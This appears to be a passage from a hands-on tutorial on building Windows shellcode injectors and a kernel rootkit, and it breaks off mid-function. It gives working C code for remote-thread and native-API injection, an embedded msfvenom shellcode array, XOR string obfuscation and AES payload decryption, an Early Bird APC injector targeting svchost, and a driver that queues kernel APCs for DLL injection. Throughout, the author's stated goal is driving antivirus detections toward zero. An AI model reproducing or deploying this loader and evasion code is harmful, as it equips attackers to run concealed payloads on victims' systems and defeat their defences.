Since CreateRemoteThread() is a very established function, you have a greater flexibility in how you use it. For instance, you can do things like use Python to do DLL injection!

rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0, lpStartExecAddr, lpExecParam, 0, NULL);
WaitForSingleObject(rThread, INFINITE);

`NtCreateThreadEx()`

NtCreateThreadEx() is an undocumented ntdll.dll function. The trouble with undocumented functions is that they may disappear or change whenever Microsoft decides. That being said, NtCreateThreadEx() came in handy when Windows session separation affected CreateRemoteThread() DLL injection.

NtCreateThreadEx() is a bit more complicated to call: we’ll need a specific structure to pass to it and another to receive data from it. I’ve detailed the implementation here:

struct NtCreateThreadExBuffer {
 ULONG Size;
 ULONG Unknown1;
 ULONG Unknown2;
 PULONG Unknown3;
 ULONG Unknown4;
 ULONG Unknown5;
 ULONG Unknown6;
 PULONG Unknown7;
 ULONG Unknown8;
 }; 


typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) (
 OUT PHANDLE hThread,
 IN ACCESS_MASK DesiredAccess,
 IN LPVOID ObjectAttributes,
 IN HANDLE ProcessHandle,
 IN LPTHREAD_START_ROUTINE lpStartAddress,
 IN LPVOID lpParameter,
 IN BOOL CreateSuspended,
 IN ULONG StackZeroBits,
 IN ULONG SizeOfStackCommit,
 IN ULONG SizeOfStackReserve,
 OUT LPVOID lpBytesBuffer
);

HANDLE bCreateRemoteThread(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {

 HANDLE hRemoteThread = NULL;

 LPVOID ntCreateThreadExAddr = NULL;
 NtCreateThreadExBuffer ntbuffer;
 DWORD temp1 = 0; 
 DWORD temp2 = 0; 

 ntCreateThreadExAddr = GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateThreadEx");

 if( ntCreateThreadExAddr ) {
 
  ntbuffer.Size = sizeof(struct NtCreateThreadExBuffer);
  ntbuffer.Unknown1 = 0x10003;
  ntbuffer.Unknown2 = 0x8;
  ntbuffer.Unknown3 = &temp2;
  ntbuffer.Unknown4 = 0;
  ntbuffer.Unknown5 = 0x10004;
  ntbuffer.Unknown6 = 4;
  ntbuffer.Unknown7 = &temp1;
  ntbuffer.Unknown8 = 0;

  LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;
  NTSTATUS status = funNtCreateThreadEx(
          &hRemoteThread;,
          0x1FFFFF,
          NULL,
          hHandle,
          (LPTHREAD_START_ROUTINE)loadLibAddr,
          dllPathAddr,
          FALSE,
          NULL,
          NULL,
          NULL,
          &ntbuffer;
          );
  
  if (hRemoteThread == NULL) {
   printf("\t[!] NtCreateThreadEx Failed! [%d][%08x]\n", GetLastError(), status);
   return NULL;
  } else {
   return hRemoteThread;
  }
 } else {
  printf("\n[!] Could not find NtCreateThreadEx!\n");
 }
 return NULL;

}

Now we can call it very much like CreateRemoteThread():

rThread = bCreateRemoteThread(hTargetProcHandle, lpStartExecAddr, lpExecParam);
WaitForSingleObject(rThread, INFINITE);

Shellcode Execution Techniques

Now, let’s dive into the world of injections. We’ll begin with some benign code that leverages Win32 APIs, examine how it functions at a fundamental level, and then transition toward more evil code that aims to bypass these APIs and arrive at a more malicious outcome. Sounds good? Check this out:

int main(void){

    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};

    if(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
)){
        printf("(-) failed to create process, error: %ld", GetLastError());
        return EXIT_FAILURE;
    }

    printf("(+) process started! PID:%ld", pi.dwProcessId);
    return EXIT_SUCCESS;
}

What’s the purpose of this code, you may wonder? You likely have an inkling already, don’t you? Well, we’re starting a fresh Notepad process. Let me assure you, there’s nothing shady about this code; it’s entirely above board and legitimate. We’re using the ‘CreateProcessW’ function, which controls precisely how a new process is launched. You provide it with a set of parameters, and voilà, a new process comes to life.

BOOL CreateProcessW(
  [in, optional]      LPCWSTR               lpApplicationName,
  [in, out, optional] LPWSTR                lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCWSTR               lpCurrentDirectory,
  [in]                LPSTARTUPINFOW        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);

Now, let’s take a deeper look into our coding journey. We’re not inventing something entirely new; instead, we’re refining existing code droppers and loaders for Windows targets, making them responsive to our session commands.

Our goal here is to run unrestricted shellcode. Our toolkit includes familiar Windows API functions: ‘OpenProcess,’ ‘VirtualAllocEx,’ ‘WriteProcessMemory,’ and ‘CreateRemoteThread.’ Think of it as conducting an orchestra, where each function plays a specific role in enabling the shellcode to do its job. We’re in charge, and the Windows targets should be ready to follow our instructions.

Injection

int main()
{
    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};
    
(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
));
  
  char shellcode[] ={
  };

    HANDLE hProcess; 
    HANDLE hThread;
    void*exec_mem;
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pi.dwProcessId);
    exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL,0,0);
    CloseHandle(hProcess);
    return 0;
}

Alright, do you notice any differences? Bingo, there’s “shellcode.” Let me clarify; the initial code segment was straightforward, mainly focusing on creating a new process (Notepad) and adjusting its priority class. However, the code we’re dealing with now is more sinister, as it centers around remote process injection and the implementation of functions such as OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to allocate memory within a target process and execute custom shellcode within it.

Nevertheless, plaintext Metasploit (msf) shellcode tends to raise red flags and is susceptible to detection by antivirus engines. In the preceding section, we delved into shellcode development, particularly emphasizing a reverse shell. Yet this code is simpler and can be swiftly pinpointed by antivirus engines. So, let’s explore an alternative strategy: how about writing the shellcode into Read-Write-Execute (RWX) memory to launch Notepad?

Alright, RWX memory implementation is fairly straightforward for our intended purpose. It involves searching a process’s private virtual memory space (the userland virtual memory space) for a memory section marked as PAGE_EXECUTE_READWRITE. If such a space is found, it’s returned. If not, the next search address is adjusted to the subsequent memory region (BaseAddress + Memory Region).

To finalize this for code execution, our shellcode must then be relocated to that discovered memory region and executed. An efficient way to achieve this is to resort to WinAPI calls, similar to what we demonstrated in the first technique. However, it’s essential to consider the drawbacks of that approach, as discussed above.

int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
        
    int newPid = atoi(argv[1]);  
    printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    LPVOID remoteBuf = VirtualAllocEx(pHandle, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    if (!remoteBuf)  
    {  
        printf("Alloc Fail\n");  
        exit(1);  
    }  
    printf("alloc addr: %p\n", remoteBuf);  
    WriteProcessMemory(pHandle, remoteBuf, shellcode, sizeof(shellcode), NULL);  
    CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuf, NULL, 0, NULL);  
    return 0;  
}

Let’s try to move away from them and use the undocumented functions within ntdll.dll directly. In this one we go a level lower, to the native API layer that the Win32 functions themselves call into.

We need:

NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx

Since these APIs are not documented by Microsoft, we need to find some external references made by reverse engineers. http://undocumented.ntinternals.net/

Let’s look at the definition of an NTAPI function from the reference link:

NTSYSAPI   
NTSTATUS  
NTAPI  
  
NtAllocateVirtualMemory(  
  
  
  IN HANDLE               ProcessHandle,  
  IN OUT PVOID            *BaseAddress,  
  IN ULONG                ZeroBits,  
  IN OUT PULONG           RegionSize,  
  IN ULONG                AllocationType,  
  IN ULONG                Protect );

NTSTATUS is the actual return value, while NTSYSAPI marks the function as a library import and NTAPI defines the windows api calling convention.

IN means the function requires it as input, while OUT means that the parameter passed in is modified with some return output.

When we prototype the functions, we just need to note the NTAPI part.
In fact, you can also use WINAPI, since both of them resolve to __stdcall.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);

Here we prototype some function pointers that we’ll map the address of the actual functions in ntdll.dll to later.

You might notice that some types are also missing, for example the POBJECT_ATTRIBUTES, so let’s find and define them from the references.

typedef struct _UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength;  
    PWSTR  Buffer;  
} UNICODE_STRING, *PUNICODE_STRING;  
  
typedef struct _OBJECT_ATTRIBUTES {  
    ULONG           Length;  
    HANDLE          RootDirectory;  
    PUNICODE_STRING ObjectName;  
    ULONG           Attributes;  
    PVOID           SecurityDescriptor;  
    PVOID           SecurityQualityOfService;  
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
  
typedef struct _PS_ATTRIBUTE {  
    ULONG Attribute;  
    SIZE_T Size;  
    union {  
        ULONG Value;  
        PVOID ValuePtr;  
    } u1;  
    PSIZE_T ReturnLength;  
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;  
  
typedef struct _PS_ATTRIBUTE_LIST  
{  
    SIZE_T       TotalLength;  
    PS_ATTRIBUTE Attributes[1];  
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

Now let’s load ntdll.dll and map the functions.

HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
if (!hNtdll)  
{  
    printf("Load ntdll fail\n");  
    exit(1);  
}  
  
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");

Finally we can call these functions.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);  
  
int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
     
	int newPid = atoi(argv[1]);  
	printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    HANDLE tHandle;  
    HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
    if (!hNtdll)  
    {  
        printf("Load ntdll fail\n");  
        exit(1);  
    }  
  
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");  
    void * allocAddr = NULL;  
    SIZE_T allocSize = sizeof(shellcode);  
    NTSTATUS status;  
    status = NtAllocateVirtualMemory(pHandle, &allocAddr, 0, (PULONG)&allocSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    printf("status alloc: %X\n", status);  
    printf("alloc addr: %p\n", allocAddr);  
    status = NtWriteVirtualMemory(pHandle, allocAddr, shellcode, sizeof(shellcode), NULL);  
    printf("status write: %X\n", status);  
    status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, NULL, pHandle, allocAddr, NULL, 0, 0, 0, 0, NULL);  
    printf("status exec: %X\n", status);  
  
	return 0;  
}

So, if you decide to upload this to antivirus engines (which I don’t recommend, but the choice is yours), what can you expect? Well, you might see 27 out of 72 detections triggering alarms left and right, screaming ‘MALICIOUS!’ It’s as if the antivirus engines are having a celebration. But here’s the real challenge: we’re striving for a complete absence of detections. We’re not looking for a party; we’re after stealth.

Like I said, msf shellcode is a giveaway, so let’s try something else. Time to dust off some classic techniques that never go out of style. We’re diving into XOR encryption, a method you’re probably familiar with when it comes to encrypting shellcode. When XOR encryption is applied to shellcode, a key is selected and every byte of the shellcode is XORed with it. To decrypt the shellcode, you simply XOR each byte with the same key once more, reversing the encryption and restoring the original shellcode. However, it’s worth noting that XOR encryption is a walk in the park to undo for anyone who knows or recovers the key. If you’re up for a challenge, check out the one I posted a while back, ReverseMeCipher, which involves XOR encryption. Here’s a writeup to give you some insights: CipherWriteup. As a general rule, it’s often smarter to combine XOR encryption with other methods.

So first we want to remove strings and debug symbols. Running the strings command on our exe reveals strings such as “NtCreateThreadEx”, which may lead to AV detection.

We can remove these strings by, again, XOR encrypting them and decrypting them at runtime. We start with the function responsible for encryption and decryption:

unsigned char * rox(unsigned char *, int, int);
unsigned char * rox(unsigned char * data, int dataLen, int xor_key)
{
    unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);

    for (int i = 0; i < dataLen; i++)
        output[i] = data[i] ^ xor_key;

    return output;
}

This function can be used for both encryption and decryption, since both apply the same XOR operation: if you XOR the encrypted data with the same xor_key, it reverts to the original data. Any helper used to produce the encrypted bytes just formats them nicely so we can copy and paste them; this one function is all we need in our actual injector.

const char* ntdll_str = (const char*)ntdll;
const char* navm_str = (const char*)navm;
const char* nwvm_str = (const char*)nwvm;
const char* ncte_str = (const char*)ncte;

So, like we said, strings such as “NtCreateThreadEx” can be indicative of the program’s functionality and may lead to antivirus (AV) detection. One way to obfuscate these strings and make them less detectable is to XOR encrypt them, and then decrypt them at runtime when they are needed.

For example:

unsigned char ntdll_data[] = {0x3d, 0x27, 0x37, 0x3f, 0x3f, 0x7d, 0x37, 0x3f, 0x3f, 0x53};
unsigned char *ntdll = rox(ntdll_data, 10, 0x53);

Let’s use VirusTotal again and check the detection rate.

Well, going from 27 detections down to 9 is indeed a notable improvement, but it’s essential to recognize that this level of evasion is still relatively basic, especially when relying on tools like msfvenom to achieve our goals.

Alright, time for a new code injection technique: “Early Bird.” It was used by the group known as APT33. How does it work? Simply put, it takes advantage of the thread setup that happens when a program starts executing on a computer. In other words, attackers inject malware code into legitimate process threads in an effort to hide malicious code inside commonly seen and legitimate processes.

We’re going to use functions like VirtualAllocEx, WriteProcessMemory, QueueUserAPC, CreateProcessW, and ResumeThread. This time, before injecting the shellcode, we run an AES decryption routine. The decryption process uses the Cryptography API functions (starting with CryptAcquireContextW) to decrypt the payload using a predefined key.

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

BOOL CryptAcquire = CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
if (CryptAcquire == false) {
//printf("CryptAcquireContextW Failed: %d\n", GetLastError());
return -1;
}

BOOL CryptCreate = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
if (CryptCreate == false) {
//printf("CryptCreateHash Failed: %d\n", GetLastError());
return -1;
}

  
BOOL CryptHash = CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
if (CryptHash == false) {
//printf("CryptHashData Failed: %d\n", GetLastError());
return -1;
}

  

BOOL CryptDerive = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
if (CryptDerive == false) {
//printf("CryptDeriveKey Failed: %d\n", GetLastError());
return -1;
}

  

BOOL Crypt_Decrypt = CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
if (Crypt_Decrypt == false) {
//printf("CryptDecrypt Failed: %d\n", GetLastError());
return -1;
}

  

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return 0;
}

The AES decryption routine ensures that the injected shellcode is in its original, unencrypted form, which is essential for executing it within the target process. This decryption process allows attackers to conceal the true nature of their payload until it is actively executed in the target process’s thread.

Next CreateProcessW

pfnCreateProcessW pCreateProcessW = (pfnCreateProcessW)GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "CreateProcessW");
if (pCreateProcessW == NULL) {
    // Handle error if the function cannot be found
}

STARTUPINFOW si;
PROCESS_INFORMATION pi;

// Clear out startup and process info structures
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si;
RtlSecureZeroMemory(&pi, sizeof(pi));

std::wstring pName = L"C:\\Windows\\System32\\svchost.exe";

HANDLE pHandle = NULL;
HANDLE hThread = NULL;
DWORD Pid = 0;

BOOL cProcess = pCreateProcessW(NULL, &pName[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

The CreateProcessW function is invoked to create a new process, which, in this case, is intended to execute the svchost.exe application. A critical parameter here is the CREATE_SUSPENDED creation flag, which starts the process with its main thread suspended. After successfully creating the suspended process, the code retrieves the process and thread handles. These handles are crucial for further manipulation of the newly created process.

pHandle = pi.hProcess;
hThread = pi.hThread;
Pid = pi.dwProcessId;

With the suspended process and its associated handles in place, we are now ready to proceed with the code injection, which involves injecting shellcode into the memory space of the newly created process.

Creating a suspended process provides an ideal opportunity to inject code and manipulate the process without raising immediate suspicion.

In the next steps, we will proceed to inject the shellcode into the suspended process, ultimately leading to its execution within the context of the target process’s thread. Before injecting the shellcode, however, memory is allocated within the target process to accommodate the injected code. This allocation is done using the VirtualAllocEx function.

LPVOID memAlloc = pVirtualAllocEx(pHandle, 0, scSize, MEM_COMMIT, PAGE_EXECUTE_READ);

The shellcode, which was previously decrypted, is now written into the allocated memory space within the target process using the WriteProcessMemory function.

DWORD wMem = pWriteProcessMemory(pHandle, (LPVOID)memAlloc, shellcode, scSize, &bytesWritten);

With the shellcode successfully injected into the target process’s memory, the code prepares for its execution. This is done using the QueueUserAPC function, which enqueues the shellcode for execution within the context of a specific thread within the target process.

if (pQueueUserAPC((PAPCFUNC)memAlloc, hThread, NULL)) {
    pResumeThread(hThread);
}

Now, let’s verify the success of our concealment strategy by injecting the shellcode into a suspended process and manipulating the memory space within the context of the process’s thread.

Out of 72 engines, we’re now down to a mere 5 detections. We started with 27, which dropped to 9, and now only 5 remain. We could keep going, and I’m pretty sure we’d hit that big zero. This overarching perspective emphasizes the importance of having a diverse array of techniques in your arsenal.

Writing a simple Rootkit

Kernel mode rootkits operate at the most privileged level, known as “Ring 0,” in the computer’s architecture. In contrast, user mode rootkits run at “Ring 3,” which is a lower privilege level.

In order to grasp the workings of kernel mode rootkits, it is essential to have a solid grasp of the basics of Windows device drivers. Essentially, a device driver is a software component responsible for interfacing with hardware and managing Input/Output Request Packets (IRPs).

Writing a Windows Device Driver

Let’s start by building a basic Windows device driver:

#include "ntddk.h"

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    DbgPrint("Hello World!");
    return STATUS_SUCCESS;
}

This simple driver initializes and prints “Hello World!” to the kernel debugger. However, to perform more complex tasks, we need to understand IRPs.

Understanding I/O Request Packets (IRPs)

IRPs are data structures used to communicate between user-mode programs and kernel-mode drivers. When a user-mode program, for example, writes data to a file handle, the kernel creates an IRP to manage this operation.

To process IRPs effectively, a driver must define functions for handling them. In the provided code, we set up a basic dispatch function that completes the IRP with a success status. In reality, different functions would handle various IRP types.

NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The driver sets up major function pointers, such as IRP_MJ_CREATE, IRP_MJ_CLOSE, IRP_MJ_READ, IRP_MJ_WRITE, and IRP_MJ_DEVICE_CONTROL, to handle specific IRP types. In a comprehensive driver, separate functions would handle these major functions.

Creating a File Handle

File handles are essential for user-mode programs to interact with kernel drivers. In Windows, to use a kernel driver from user-mode, the user-mode program must open a file handle to the driver. The driver first registers a named device, and then the user-mode program opens it as if it were a file.

const WCHAR deviceNameBuffer[] = L"\\Device\\MyDevice";
PDEVICE_OBJECT g_RootkitDevice; // Global pointer to our device object

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceNameUnicodeString;

    RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);

    ntStatus = IoCreateDevice(DriverObject, 0, &deviceNameUnicodeString, 0x00001234, 0, TRUE, &g_RootkitDevice);
    // ...
}

This code registers a device named “MyDevice.” A user-mode program can open this device using a fully qualified path, e.g., \\\\Device\\MyDevice. This file handle can be used with functions like ReadFile and WriteFile, which generate IRPs for communication.

Understanding the interaction between user-mode and kernel-mode via IRPs and file handles is fundamental to writing effective Windows device drivers, an essential concept in the realm of kernel mode rootkits.

Remember DLL Injection? Now, let’s take a look at how it’s employed by rootkits to inject malicious code or custom device drivers directly into the Windows kernel. In the context of the previously discussed device driver and rootkit concepts, we can explore how kernel-mode DLL injection fits into the picture:

Kernel-Mode DLL

The process typically begins with the DriverEntry function, which is the entry point for our driver. Here’s how we start:

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverobject, IN PUNICODE_STRING pRegister)
{

NTSTATUS st;
  
PsSetLoadImageNotifyRoutine(&LoadImageNotifyRoutine);

pDriverobject->DriverUnload = (PDRIVER_UNLOAD)Unload;
  
return STATUS_SUCCESS;
}

In this code snippet, we employ the PsSetLoadImageNotifyRoutine function to register an image load notification routine. This step is crucial as it allows us to monitor the loading of specific system DLLs, such as kernel32.dll, into a process’s address space.

Additionally, we set the driver’s unload function (pDriverobject->DriverUnload) to handle cleanup operations when the driver is unloaded. This ensures that any resources or callbacks registered during the driver’s lifetime are properly managed.

Image Load Notification

Our monitoring process hinges on image load notifications. We need to identify when the system loads kernel32.dll, a fundamental DLL for Windows operating systems. The LoadImageNotifyRoutine function enables this monitoring.

VOID LoadImageNotifyRoutine(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo)
{
    if (ImageName != NULL)
    {
        // Check if the loaded image matches the name of kernel32.dll
        WCHAR kernel32Mask[] = L"*\\KERNEL32.DLL";
        UNICODE_STRING kernel32us;
        RtlInitUnicodeString(&kernel32us, kernel32Mask);

        if (FsRtlIsNameInExpression(&kernel32us, ImageName, TRUE, NULL))
        {
            PKAPC Apc;
            
            if (Hash.Kernel32dll == 0)
            {
                // Initialize the Hash structure and import the function addresses
                Hash.Kernel32dll = (PVOID)pImageInfo->ImageBase;
                Hash.pvLoadLibraryExA = (fnLoadLibraryExA)ResolveDynamicImport(Hash.Kernel32dll, SIRIFEF_LOADLIBRARYEXA_ADDRESS);
            }

            // Create an Asynchronous Procedure Call (APC) to initiate DLL injection
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                KeInitializeApc(Apc, KeGetCurrentThread(), 0, (PKKERNEL_ROUTINE)APCInjectorRoutine, 0, 0, KernelMode, 0);
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
            }
        }
    }
    return;
}

The LoadImageNotifyRoutine function plays a pivotal role in our DLL injection process. It checks if the ImageName parameter is not NULL, ensuring that we are actively monitoring loaded images with names. Furthermore, we examine if the loaded image matches the name of kernel32.dll.

If a match is found, we proceed with initializing the Hash structure and creating an Asynchronous Procedure Call (APC) using the APCInjectorRoutine. The APC serves as a mechanism to trigger the DLL injection process into a target process.

These code snippets are instrumental in monitoring and responding to the loading of kernel32.dll and lay the groundwork for our upcoming discussion on kernel-mode DLL injection.

Unloading the Driver

Before we dive deeper into DLL injection, it’s essential to understand how the driver can be unloaded properly. We accomplish this using the Unload function.

VOID Unload(IN PDRIVER_OBJECT pDriverobject)
{
    // Remove the image load notification routine
    PsRemoveLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
}

Here, we use the PsRemoveLoadImageNotifyRoutine function to unregister the previously registered image load notification routine. This step ensures that we can gracefully clean up and stop monitoring loaded images when the driver is unloaded.

DLL Injection

Our exploration of kernel-mode DLL injection is incomplete without understanding how the actual injection takes place. The DllInject function is the key to achieving this.

NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS Peprocess, PETHREAD Pethread, BOOLEAN Alert)
{
    HANDLE hProcess;
    OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
    CLIENT_ID cidprocess = { 0 };
    CHAR DllFormatPath[] = "C:\\foo.dll";
    ULONG Size = strlen(DllFormatPath) + 1;
    PVOID pvMemory = NULL;

    cidprocess.UniqueProcess = ProcessId;
